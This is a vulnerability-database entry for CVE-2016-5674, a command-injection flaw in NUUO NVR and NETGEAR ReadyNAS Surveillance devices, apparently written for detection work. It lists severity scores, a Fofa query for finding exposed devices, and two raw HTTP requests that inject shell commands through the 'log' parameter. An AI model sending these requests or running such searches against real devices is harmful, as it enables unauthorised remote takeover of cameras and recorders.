🔙 목록으로 돌아가기

CVE-2016-5674: NUUO NVR camera `debugging_center_utils_.php` - Command Execution

TitleNUUO NVR camera `debugging_center_utils_.php` - Command Execution
AuthorDhiyaneshDK
SeverityCritical
ImpactAttackers can execute arbitrary PHP code remotely without authentication through command injection, leading to complete server compromise and data breach.
RemediationUpdate NUUO NVR devices to the latest firmware version that patches the command injection vulnerability.
CVSS Score9.8
EPSS Score0.89376
CVE IDCVE-2016-5674
CWE IDCWE-20
Fofa Queryapp="NUUO-NVRmini" || app="NUUO-NVR" || title="Network Video Recorder Login"app="nuuo-nvrmini" || app="nuuo-nvr" || title="network video recorder login"
Tags cve cve2016 nuuo rce netgear vkev vuln

🔍 Vulnerability Description

debugging_center_utils_.php in NUUO NVRmini 2 1.7.5 through 3.0.0, NUUO NVRsolo 1.7.5 through 3.0.0, and NETGEAR ReadyNAS Surveillance 1.1.1 through 1.4.1 allows remote attackers to execute arbitrary PHP code via the log parameter.

🌐 HTTP Request

GET /__debugging_center_utils___.php?log=;echo%20fdscanimldbfibbbzipxxzvvgpnqoirq%20|%20id HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /__debugging_center_utils___.php?log=;echo%20fdscanimldbfibbbzipxxzvvgpnqoirq%20|%20ipconfig HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.8
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-5674.yaml

🦈 Packet Capture: ⬇️ Download cve-2016-5674.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A